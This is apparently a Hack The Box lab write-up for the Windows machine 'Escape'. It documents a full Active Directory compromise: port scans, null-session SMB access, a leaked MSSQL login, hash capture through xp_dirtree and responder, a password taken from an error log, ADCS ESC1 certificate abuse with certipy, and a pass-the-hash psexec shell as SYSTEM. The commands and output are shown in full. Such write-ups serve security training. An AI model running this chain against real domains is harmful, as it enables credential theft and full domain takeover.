Escape - wook413

#hackthebox #medium #windows #ADCS #Certify #Certipy #MSSQL ![[Pasted image 20250801000311.png]] # Information Gathering - Nmap TCP scan against all ports revealed the following: ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-31 03:36 UTC Nmap scan report for 10.10.11.202 Host is up (0.049s latency). Not shown: 65516 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1433/tcp open ms-sql-s 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 49667/tcp open unknown 49689/tcp open unknown 49690/tcp open unknown 49709/tcp open unknown 49714/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 43.90 seconds ``` Another TCP scan against the ports found for more information ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49709,49714 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-31 03:38 UTC Nmap scan report for 10.10.11.202 Host is up (0.050s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-31 11:41:33Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-07-31T11:43:02+00:00; +8h03m05s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-07-31T11:43:03+00:00; +8h03m05s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-ntlm-info: | 10.10.11.202:1433: | Target_Name: sequel | NetBIOS_Domain_Name: sequel | NetBIOS_Computer_Name: DC | DNS_Domain_Name: sequel.htb | DNS_Computer_Name: dc.sequel.htb | DNS_Tree_Name: sequel.htb |_ Product_Version: 10.0.17763 |_ssl-date: 2025-07-31T11:43:02+00:00; +8h03m05s from scanner time. | ms-sql-info: | 10.10.11.202:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-07-31T11:37:19 |_Not valid after: 2055-07-31T11:37:19 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-07-31T11:43:02+00:00; +8h03m05s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-07-31T11:43:03+00:00; +8h03m05s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49690/tcp open msrpc Microsoft Windows RPC 49709/tcp open msrpc Microsoft Windows RPC 49714/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 8h03m04s, deviation: 0s, median: 8h03m04s | smb2-time: | date: 2025-07-31T11:42:24 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 96.55 seconds ``` Lastly a UDP scan ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-31 03:40 UTC Nmap scan report for 10.10.11.202 Host is up (0.050s latency). PORT STATE SERVICE 53/udp open domain 67/udp open|filtered dhcps 123/udp open ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds ``` # Enumeration ##### SMB - TCP 139, 445 I'm pretty sure this is a DC host. The ports and these shares make me almost feel positive this is a DC host. `SMB` allows null authentication, which I confirmed with `smbclient` and `netexec` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ smbclient -N -L //$IP Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Public Disk SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` ![[Pasted image 20250730224434.png]] Inside the `Public` share, there's a pdf file. I downloaded the file to my kali ![[Pasted image 20250730225851.png]] The pdf file contained a lot of information including three names: `Ryan`, `Tom`, and `Brandon` Hovering over the hyperlink on the name `Brandon` revealed his email address: `[email protected]` ![[Pasted image 20250730230237.png]] Next page also contained a valuable information: a set of credentials! `PublicUser:GuestUserCantWrite1` ![[Pasted image 20250730230305.png]] # Initial Access - as `sql_svc` ##### MSSQL - TCP 1433 I logged into `MSSQSL` with the found credentials using `mssqlclient` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@$IP Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'. [*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (PublicUser guest@master)> ``` I tried `xp_cmdshell_whoami` but it was denied. I tried enabling `xp_cmdshell` but it says the current use has no permission to perform such task. ![[Pasted image 20250731215605.png]] We can try `SMB forced authentication` with `xp_dirtree` plus `responder`. I was able to capture the `sql_svc`'s hash. ![[Pasted image 20250731220619.png]] Successfully cracked the hash with `hashcat` ![[Pasted image 20250731220844.png]] `sql_svc:REGGIE1234ronnie` `nxc` confirms the credentials are valid. ![[Pasted image 20250731221021.png]] # Lateral Movement - to `ryan.cooper` Under `C:\`, there was a directory named `SQLServer`. Since we are currently logged in as `sql_svc` user, it's very reasonable to explore that directory ![[Pasted image 20250731223302.png]] Inside `C:\SQLServer\Logs`, there was a backup file named `ERRORLOG.BAK` ![[Pasted image 20250731223338.png]] Inside the log file, there were 2 error logs that stood out to me. The first red box shows that `sequel.htb\Ryan.Cooper` has failed to log in because his password did not match. Then, the second red box tells us that the user `NucleMosquito3` entered the wrong password. This suggests that the user `Ryan.Cooper` might have first entered the wrong password or accidentally pressed the enter too soon, and then typed his password again, which could be `NuclearMosquito3`. I might be wrong but they could potentially be a valid credential pair. ![[Pasted image 20250731223540.png]] Successfully logged in as `Ryan.Cooper` ![[Pasted image 20250731224318.png]] Found `user.txt` in `C:\Users\Ryan.Cooper\Desktop` ```powershell *Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir Directory: C:\Users\Ryan.Cooper\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 8/1/2025 3:48 AM 34 user.txt *Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt f6ad... ``` # Privilege Escalation It's highly likely `AD CS` exists in the domain because the nmap results mentioned `ssl-cert` a few times. So I'm going to check for it using `certify.exe` Before that, I confirmed `ADCS` do exists in the domain using `nxc`. I'll note the name of CA ![[Pasted image 20250731232243.png]] Transferred `Certify.exe` from my local kali to remote `evil-winrm` ![[Pasted image 20250731232103.png]] Now we can check if there are any templates insecurely configured in the ADCS using `Certify.exe`. However, I kept failing to run the binary. Therefore, I'm going to use `Certipy` instead. `certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target $IP -stdout -vulnerable` It reveals the template has `ESC1` vulnerability ![[Pasted image 20250731234419.png]] We can see the CA Name we discovered earlier using `nxc` and also I grabbed the Template Name `UserAuthentication`. ![[Pasted image 20250731234610.png]] Then I grabbed the `.pfx` file using the command below. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ certipy-ad req -u ryan.cooper -p NuclearMosquito3 -ca sequel-DC-CA -target $IP -template UserAuthentication -upn Administrator@sequel. htb Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Request ID is 13 [*] Successfully requested certificate [*] Got certificate with UPN '[email protected]' [*] Certificate has no object SID [*] Try using -sid to set the object SID or see the wiki for more details [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx' ``` Tried to get TGT using the command below but it failed because of the `clock skew` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ certipy-ad auth -pfx administrator.pfx -dc-ip $IP Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: '[email protected]' [*] Using principal: '[email protected]' [*] Trying to get TGT... [-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) [-] Use -debug to print a stacktrace [-] See the wiki for more information ``` I tried match my clock with the target with `sudo ntpdate $IP` but it still did not work. I do not know why but the same error happened to me before, so I found this workaround on the Internet a while ago, which magically helped me out for this time AGAIN! I got the hash for `administrator` user. ```bash ┌──(root㉿kali)-[/home/kali/Desktop] └─# timedatectl set-ntp off ┌──(root㉿kali)-[/home/kali/Desktop] └─# rdate -n $IP Fri Aug 1 12:57:29 UTC 2025 ┌──(root㉿kali)-[/home/kali/Desktop] └─# certipy-ad auth -pfx administrator.pfx -dc-ip $IP Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: '[email protected]' [*] Using principal: '[email protected]' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'administrator.ccache' [*] Wrote credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee ``` Finally I got the shell as `nt authority\system` user via `psexec` ```powershell ┌──(root㉿kali)-[/home/kali/Desktop] └─# impacket-psexec administrator@$IP -hashes aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on 10.10.11.202..... [*] Found writable share ADMIN$ [*] Uploading file UifofcKK.exe [*] Opening SVCManager on 10.10.11.202..... [*] Creating service bZeq on 10.10.11.202..... [*] Starting service bZeq..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.2746] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system ``` Got `root.txt` ```powershell Directory of C:\Users\Administrator\Desktop 02/06/2023 04:43 PM <DIR> . 02/06/2023 04:43 PM <DIR> .. 08/01/2025 03:48 AM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 5,993,553,920 bytes free C:\Users\Administrator\Desktop> type root.txt 8a5c... ```